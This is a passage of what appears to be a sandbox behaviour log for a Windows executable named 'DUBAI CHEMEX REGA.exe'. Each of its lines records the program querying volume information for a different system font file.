                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
